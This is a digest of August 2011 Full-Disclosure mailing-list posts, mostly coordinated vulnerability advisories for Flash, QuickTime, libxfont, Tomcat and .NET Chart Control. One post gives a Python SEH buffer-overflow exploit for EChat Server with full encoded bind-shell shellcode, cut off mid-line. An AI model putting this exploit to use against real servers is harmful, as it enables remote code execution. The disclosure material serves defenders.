[Full-disclosure] ZDI-11-253: Adobe Flash Player BitmapData.scroll Integer Overflow Remote Code Execution Vulnerability
ZDI-11-253: Adobe Flash Player BitmapData.scroll Integer Overflow Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-253 August 12, 2011 -- CVE ID: CVE-2011-2138 -- CVSS: 7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P) -- Affected Vendors: Adobe -- Affected Products: Adobe Flash Player -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Adobe Flash Player. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the code responsible for evaluating the scroll method of the Actionscript Bitmap class. The function that uses the parameters to the scroll method performs arithmetic using data from the instantiated Bitmap object. By creating a Bitmap with certain integer values and subsequently calling the scroll method with other large integer values it is possible to force an integer wrap to occur. The resulting value is utilized to calculate a pointer which is operated upon by memory copy operations. By crafting specific values this issue can be exploited to execute remote code in the context of the user running the browser. -- Vendor Response: Adobe has issued an update to correct this vulnerability. More details can be found at: http://www.adobe.com/support/security/bulletins/apsb11-21.html -- Disclosure Timeline: 2011-06-02 - Vulnerability reported to vendor 2011-08-12 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-11-252: Apple QuickTime PICT Image PnSize Opcode Remote Code Execution Vulnerability
ZDI-11-252: Apple QuickTime PICT Image PnSize Opcode Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-11-252 August 8, 2011 -- CVE ID: CVE-2011-0257 -- CVSS: 7.5, (AV:N/AC:L/Au:N/C:P/I:P/A:P) -- Affected Vendors: Apple -- Affected Products: Apple Quicktime -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Quicktime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the way Quicktime handles the PnSize PICT opcode. It converts an unsigned 16 bit value into a signed 32 bit value. This value is later used as the size parameter for a memory copy function that copies from the file onto the stack. The results in a stack based buffer overflow that allows for remote code execution under the context of the current user. -- Vendor Response: Apple has issued an update to correct this vulnerability. More details can be found at: http://support.apple.com/kb/HT4826 -- Disclosure Timeline: 2011-04-11 - Vulnerability reported to vendor 2011-08-08 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Matt "j00ru" Jurczyk -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Security Tool - Video] INSECT Pro 2.6.1 available
These guys just ought to be really happy it's a fricken pain in the ass to get mod_frontpage 5.2 working these days or some highly annoyed person could start churning up a private exploit for the known associated vulnerability. That or fire up canvas/core impact(I don't remember which one had the exploit for it), but sadly no public exploit for it or he would likely have gone down fast and hard. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] INSECT Pro - Exploit EChat Server <= v2.5 20110812 - Remote Buffer Overflow Exploit
Information Name : EChat Server <= v2.5 Software : E Chat Server Vendor Homepage : http://www.echatserver.com/ Vulnerability Type : Remote Buffer Overflow Exploit Severity : High Researcher : Juan Sacco (Runlvl) Description -- EChat Server is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. Successfully exploiting this issue will allow an attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. Exploit example as follow - #!/usr/bin/python # Easy Chat Server Server <= v2.5 Remote Buffer Overflow Exploit # Written by Juan Sacco (Runlvl) # Contact: jsa...@insecurityresearch.com # Web site: http://www.insecurityresearch.com # Target tested: Windows XP SP3 import string, sys import socket, httplib import telnetlib def howtousage(): print "Sorry, required arguments: Host Port" sys.exit(-1) def run(): try: # Basic structure: JUNK + NSEH + SEH + SHELLCODE Junk = '\x41' * 216 # 216 bytes of A nSEH = '\xEB\x06\x90\x90' # JMP 6 bytes short SEH = '\xE1\xB2\x01\x10' # 0x1001b2e1 pop edi; pop esi; ret # ShellCode Bind TCP PORT 444 Lenght 751 Encode : Alpha Upper ShellCode = ( "\x89\xe1\xd9\xed\xd9\x71\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x43\x30" "\x45\x50\x45\x50\x43\x50\x4c\x49\x4b\x55\x50\x31\x4e\x32\x45" "\x34\x4c\x4b\x50\x52\x50\x30\x4c\x4b\x56\x32\x54\x4c\x4c\x4b" "\x50\x52\x52\x34\x4c\x4b\x54\x32\x47\x58\x54\x4f\x4e\x57\x51" "\x5a\x56\x46\x50\x31\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c" "\x45\x31\x43\x4c\x43\x32\x56\x4c\x47\x50\x4f\x31\x58\x4f\x54" "\x4d\x45\x51\x58\x47\x5a\x42\x4c\x30\x51\x42\x56\x37\x4c\x4b" "\x56\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x58\x50\x4c" "\x4b\x47\x30\x54\x38\x4d\x55\x49\x50\x52\x54\x51\x5a\x45\x51" "\x4e\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x51" "\x30\x45\x51\x58\x53\x5a\x43\x47\x4c\x51\x59\x4c\x4b\x56\x54" "\x4c\x4b\x45\x51\x49\x46\x50\x31\x4b\x4f\x50\x31\x49\x50\x4e" "\x4c\x49\x51\x58\x4f\x54\x4d\x45\x51\x58\x47\x56\x58\x4d\x30" "\x54\x35\x5a\x54\x54\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x47" "\x54\x52\x55\x4d\x32\x50\x58\x4c\x4b\x51\x48\x51\x34\x43\x31" "\x4e\x33\x43\x56\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x56\x38\x45" "\x4c\x45\x51\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x45\x51\x4e\x30" "\x4c\x49\x50\x44\x56\x44\x56\x44\x51\x4b\x51\x4b\x45\x31\x51" "\x49\x50\x5a\x50\x51\x4b\x4f\x4d\x30\x56\x38\x51\x4f\x50\x5a" "\x4c\x4b\x54\x52\x5a\x4b\x4b\x36\x51\x4d\x52\x48\x56\x53\x47" "\x42\x43\x30\x45\x50\x43\x58\x43\x47\x43\x43\x47\x42\x51\x4f" "\x56\x34\x52\x48\x50\x4c\x52\x57\x56\x46\x45\x57\x4b\x4f\x4e" "\x35\x4e\x58\x5a\x30\x45\x51\x43\x30\x45\x50\x51\x39\x4f\x34" "\x51\x44\x56\x30\x52\x48\x51\x39\x4d\x50\x52\x4b\x45\x50\x4b" "\x4f\x4e\x35\x56\x30\x56\x30\x50\x50\x50\x50\x47\x30\x50\x50" "\x47\x30\x50\x50\x52\x48\x5a\x4a\x54\x4f\x49\x4f\x4d\x30\x4b" "\x4f\x49\x45\x4d\x59\x58\x47\x50\x31\x49\x4b\x56\x33\x52\x48" "\x43\x32\x43\x30\x54\x51\x51\x4c\x4b\x39\x4d\x36\x43\x5a\x54" "\x50\x56\x36\x50\x57\x52\x48\x49\x52\x49\x4b\x56\x57\x43\x57" "\x4b\x4f\x58\x55\x50\x53\x56\x37\x52\x48\x4f\x47\x4b\x59\x50" "\x38\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x51\x43\x51\x47\x43\x58" "\x43\x44\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x51\x47\x4c" "\x49\x4f\x37\x52\x48\x52\x55\x52\x4e\x50\x4d\x45\x31\x4b\x4f" "\x4e\x35\x45\x38\x45\x33\x52\x4d\x45\x34\x45\x50\x4c\x49\x5a" "\x43\x51\x47\x51\x47\x51\x47\x50\x31\x5a\x56\x52\x4a\x45\x42" "\x51\x49\x56\x36\x4d\x32\x4b\x4d\x45\x36\x4f\x37\x51\x54\x51" "\x34\x47\x4c\x43\x31\x43\x31\x4c\x4d\x47\x34\x56\x44\x54\x50" "\x49\x56\x45\x50\x51\x54\x51\x44\x50\x50\x50\x56\x56\x36\x56" "\x36\x47\x36\x51\x46\x50\x4e\x51\x46\x50\x56\x56\x33\x51\x46" "\x43\x58\x52\x59\x58\x4c\x47\x4f\x4c\x46\x4b\x4f\x58\x55\x4c" "\x49\x4b\x50\x50\x4e\x51\x46\x47\x36\x4b\x4f\x56\x50\x45\x38" "\x54\x48\x4d\x57\x45\x4d\x43\x50\x4b\x4f\x49\x45\x4f\x4b\x4b" "\x4e\x54\x4e\x50\x32\x4b\x5a\x52\x48\x4e\x46\x4c\x55\x4f\x4d" "\x4d\x4d\x4b\x4f\x4e\x35\x47\x4c\x54\x46\x43\x4c\x45\x5a\x4b" "\x30\x4b\x4b\x4b\x50\x54\x35\x43\x35\x4f\x4b\x47\x37\x45\x43" "\x52\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41" "\x41") ShellCodePort = CraftedBuffer = Junk + nSEH + SEH + ShellCode vulnerableURL = '/chat.ghp?username=' + CraftedBuffer + '&password=null&room=1&null=2' Connection = httplib.HTTPConnection(Host,
[Full-disclosure] [SECURITY] [DSA 2293-1] libxfont security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2293-1 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst August 12, 2011http://www.debian.org/security/faq - - Package: libxfont Vulnerability : buffer overflow Problem type : local Debian-specific: no CVE ID : CVE-2011-2895 Tomas Hoger found a buffer overflow in the X.Org libXfont library, which may allow for a local privilege escalation through crafted font files. For the oldstable distribution (lenny), this problem has been fixed in version 1.3.3-2. For the stable distribution (squeeze), this problem has been fixed in version 1.4.1-3. For the unstable distribution (sid), this problem has been fixed in version 1.4.4-1. We recommend that you upgrade your libxfont packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iQEcBAEBAgAGBQJORTVOAAoJEOxfUAG2iX57GdQH/jAs25PDrIb0/j1lmxUxvE2w hIZrq/NKYzUIG07RjOHnWwcsRHB3XirSAQUcK4u81DgWlNHbyFoaAuybYm+SoQRR wF0JEMtwx83C8Ge91tbhUoJqiBwCGr2PFkYptk9fBbSkHDa6qUGWBYuLx7IdOCtU 0OCA0m83D4RDKZfMKsaFM8O9xyVX8/selLk+PGaNrRO14tXMIkQNVNphN4dVDOxY EX1n6MRQlyawLh1U3d0x2cfSDlyYurBIo8z60Qgxm5CxPPLlWynhcHlR0Gu1ryIc zuA/v+gN+ZP7KOB4orOxuwipD9G3r5vYWSWOthOqK4sJUhmtTnw7iKOkEAb9omU= =fZ5c -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] DEF CON 19 - hackers get hacked!
wow. this is just fucking crazy. any thought on who was behind it? i can not find anyone taking credit. does anyone else think mayhaps the government might have some thing to do with this? On Thu, Aug 11, 2011 at 8:44 AM, Basan wrote: > > - Original Message - > > From: -= Glowing Sex =- > > Sent: 08/10/11 10:56 AM > > To: coderman > > Subject: Re: [Full-disclosure] DEF CON 19 - hackers get hacked! > > times are a changing... but, i see now what tyou mean... still, i just > dont > > know why people even INSTALL or, accept anything at a defcon meeting, ofc > > someone will try to make some name, mining for data, is stealing an id > > nowdays, so there would be GREat potential for one device, to connect to > > some network, and rescan for other weak/known exploits... then you have > an > > army :) > > To my knowledge, I was watching people's devices getting popped with little > to no interaction by their part. If memory serves me correctly maybe someone > did an apt-get update on their machine, but outside of that just the usual > browsing and remote work. > > > but, intersting about 4G... i have not yet to see that haxd so, 1 point > for > > that but, thats prolly coz ui aint really been looking at that side of it > > It was impressive. Essentially if you had a device on and near the Rio > during (and for some time after) DEF CON, you had a high chance of being > compromised. > > -- > Basan - Your friendly fire-breathing chicken monster > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2011-2481: Apache Tomcat information disclosure vulnerability
CVE-2011-2481: Apache Tomcat information disclosure vulnerability Severity: low Vendor: The Apache Software Foundation Versions Affected: Tomcat 7.0.0 to 7.0.16 Previous versions are not affected. Description: The re-factoring of XML validation for Tomcat 7.0.x re-introduced the vulnerability previously reported as CVE-2009-0783. This was initially reported as a memory leak (https://issues.apache.org/bugzilla/show_bug.cgi?id=51395). If a web application is the first web application loaded, this bug allows that web application to potentially view and/or alter the web.xml, context.xml and tld files of other web applications deployed on the Tomcat instance. Mitigation: 7.0.x users should upgrade to 7.0.17 or later Example: See https://issues.apache.org/bugzilla/show_bug.cgi?id=29936#c12 for an example web application that can be used to replace the XML parser used by Tomcat. Credit: The security implications of bug 51395 were identified by the Tomcat security team. References: http://tomcat.apache.org/security.html http://tomcat.apache.org/security-7.html The Apache Tomcat Security Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] CVE-2011-2729: Commons Daemon fails to drop capabilities (Apache Tomcat)
CVE-2011-2729: Commons Daemon fails to drop capabilities (Apache Tomcat) Severity: Important Vendor: The Apache Software Foundation Versions Affected: Tomcat 7.0.0 to 7.0.19 Tomcat 6.0.30 to 6.0.32 Tomcat 5.5.32 to 5.5.33 Description: Due to a bug in the capabilities code, jsvc (the service wrapper for Linux that is part of the Commons Daemon project) does not drop capabilities allowing the application to access files and directories owned by superuser. This vulnerability only applies if: a) Tomcat is running on a Linux operating system b) jsvc was compiled with libcap c) -user parameter is used The Tomcat versions above shipped with source files for jsvc that included this vulnerability. Mitigation: Affected users of all versions can mitigate these vulnerabilities by taking any of the following actions: a) upgrade to jsvc 1.0.7 or later b) do not use -user parameter to switch user c) recompile the jsvc without libcap support Updated jsvc source is included in Apache Tomcat 7.0.20 and will be included in the next releases of Tomcat 6.0.x and 5.5.x. Updated source can be obtained from the Apache Commons Daemon project. Credit: This issue was identified by Wilfried Weissmann. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [Announcement] ClubHack Magazine Issue 19-August2011
Hello All, here we are with issue19 of ClubHack Mag for the month of August 2011. Unlike other issues, this is not theme based! This issue covers following articles:- 0x00 Tech Gyan - Gonna' Break It On Down Gonna' Kick It Root Down 0x01 Tool Gyan - SniffJoke – Defeating Interception Framework 0x02 Mom's Guide - RSA Security 0x03 Legal Gyan - Patent Law and Computer technology 0x04 Matriux Vibhag - SOCIAL ENGINEERING TOOLKIT 0x05 Poster of the Month. Check http://chmag.in for articles. PDF version can be download from:- http://chmag.in/issue/aug2011.pdf Hope you'll enjoy the magazine. Please send your suggestions, feedback to i...@chmag.in Regards, Abhijeet Patil, ClubHack Mag URL: http://chmag.in htp://clubhack.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Context IS Advisory - MS11-066 .NET 4 - Microsoft Chart Control
Is there a POC or an exploit already for this vulnerability ? On Thu, Aug 11, 2011 at 9:38 PM, Context IS - Disclosure wrote: > ===ADVISORY=== > Systems Affected: .NET 4 - Microsoft Chart Control > Severity: High > Category: Information Disclosure > Author: Context Information Security Ltd > Reported to vendor: 3rd October 2010 > Advisory Issued: 11th August 2011 > Reference: MS11-066, CVE-2011-1977 > ===ADVISORY=== > > Description > --- > The Microsoft Chart Control is vulnerable to an information disclosure > vulnerability. By sending a specific GET request to an application > implementing the chart control, attackers could read arbitrary files on the > system. > > Analysis > > The Microsoft Chart Control plots graphs and with the default configuration > stores those as image files in a directory on the system. The graph images > are retrieved using GET requests and a file path parameter. > > When the control retrieves a request, it verifies that the requested file > path lies within the allowed directory and if so reads and returns the file’s > contents. However, the verification process was found to be flawed, resulting > in the ability to traverse directories to load arbitrary files. > > The Microsoft Chart Control is included in the .NET Framework 4 or can be > downloaded separately for .NET 3.5 (http://code.msdn.microsoft.com/mschart). > > This vulnerability was found using the Context App Tool (CAT > http://cat.contextis.com). > > Technologies Affected > - > > Microsoft .Net Framework 4 > > > Vendor Response > --- > Microsoft advises users to patch the .Net Framework to the latest version. > See the following Microsoft security bulletin for more details: > http://www.microsoft.com/technet/security/Bulletin/MS11-066.mspx > > > Disclosure Timeline > --- > 3rd October 2010 – Vendor Notification > 4th October 2010 – First Vendor Response > 16th November 2010 – Vendor Confirms Vulnerability > 9th August 2011 – Vendor Patch Released > > > Credits > > Nico Leidecker and James Forshaw of Context Information Security Ltd > > > About Context Information Security > -- > > Context Information Security is an independent security consultancy > specialising in both technical security and information assurance services. > > The company was founded in 1998. Its client base has grown steadily over the > years, thanks in large part to personal recommendations from existing clients > who value us as business partners. We believe our success is based on the > value our clients place on our product-agnostic, holistic approach; the way > we work closely with them to develop a tailored service; and to the > independence, integrity and technical skills of our consultants. > > The company’s client base now includes some of the most prestigious blue chip > companies in the world, as well as government organisations. > > The best security experts need to bring a broad portfolio of skills to the > job, so Context has always sought to recruit staff with extensive business > experience as well as technical expertise. Our aim is to provide effective > and practical solutions, advice and support: when we report back to clients > we always communicate our findings and recommendations in plain terms at a > business level as well as in the form of an in-depth technical report. > > Web: www.contextis.com > Email: disclos...@contextis.com > > > > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [MOHSEP] Month Of Humorous Stefan Esser Photoshops - 0x0B
Hi guys :) Welcome to day 11 of amazing k-rad-tastic MOHSEP. The only security project with more photoshops than travisto has bugs in Flash. Remember Travis, a single case file does not equal a bug! It does not equal a funny photoshop either which is why we only publish the very best submissions. Anyway, link is here: http://mohsepblog.blogspot.com/2011/08/thursday-august-11th-2011.html enjoy, until tomorrow Herr E Balls ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Context IS Advisory - MS11-066 .NET 4 - Microsoft Chart Control
===ADVISORY=== Systems Affected:.NET 4 - Microsoft Chart Control Severity:High Category:Information Disclosure Author: Context Information Security Ltd Reported to vendor: 3rd October 2010 Advisory Issued: 11th August 2011 Reference: MS11-066, CVE-2011-1977 ===ADVISORY=== Description --- The Microsoft Chart Control is vulnerable to an information disclosure vulnerability. By sending a specific GET request to an application implementing the chart control, attackers could read arbitrary files on the system. Analysis The Microsoft Chart Control plots graphs and with the default configuration stores those as image files in a directory on the system. The graph images are retrieved using GET requests and a file path parameter. When the control retrieves a request, it verifies that the requested file path lies within the allowed directory and if so reads and returns the file’s contents. However, the verification process was found to be flawed, resulting in the ability to traverse directories to load arbitrary files. The Microsoft Chart Control is included in the .NET Framework 4 or can be downloaded separately for .NET 3.5 (http://code.msdn.microsoft.com/mschart). This vulnerability was found using the Context App Tool (CAT http://cat.contextis.com). Technologies Affected - Microsoft .Net Framework 4 Vendor Response --- Microsoft advises users to patch the .Net Framework to the latest version. See the following Microsoft security bulletin for more details: http://www.microsoft.com/technet/security/Bulletin/MS11-066.mspx Disclosure Timeline --- 3rd October 2010 – Vendor Notification 4th October 2010 – First Vendor Response 16th November 2010 – Vendor Confirms Vulnerability 9th August 2011 – Vendor Patch Released Credits Nico Leidecker and James Forshaw of Context Information Security Ltd About Context Information Security -- Context Information Security is an independent security consultancy specialising in both technical security and information assurance services. The company was founded in 1998. Its client base has grown steadily over the years, thanks in large part to personal recommendations from existing clients who value us as business partners. We believe our success is based on the value our clients place on our product-agnostic, holistic approach; the way we work closely with them to develop a tailored service; and to the independence, integrity and technical skills of our consultants. The company’s client base now includes some of the most prestigious blue chip companies in the world, as well as government organisations. The best security experts need to bring a broad portfolio of skills to the job, so Context has always sought to recruit staff with extensive business experience as well as technical expertise. Our aim is to provide effective and practical solutions, advice and support: when we report back to clients we always communicate our findings and recommendations in plain terms at a business level as well as in the form of an in-depth technical report. Web:www.contextis.com Email: disclos...@contextis.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
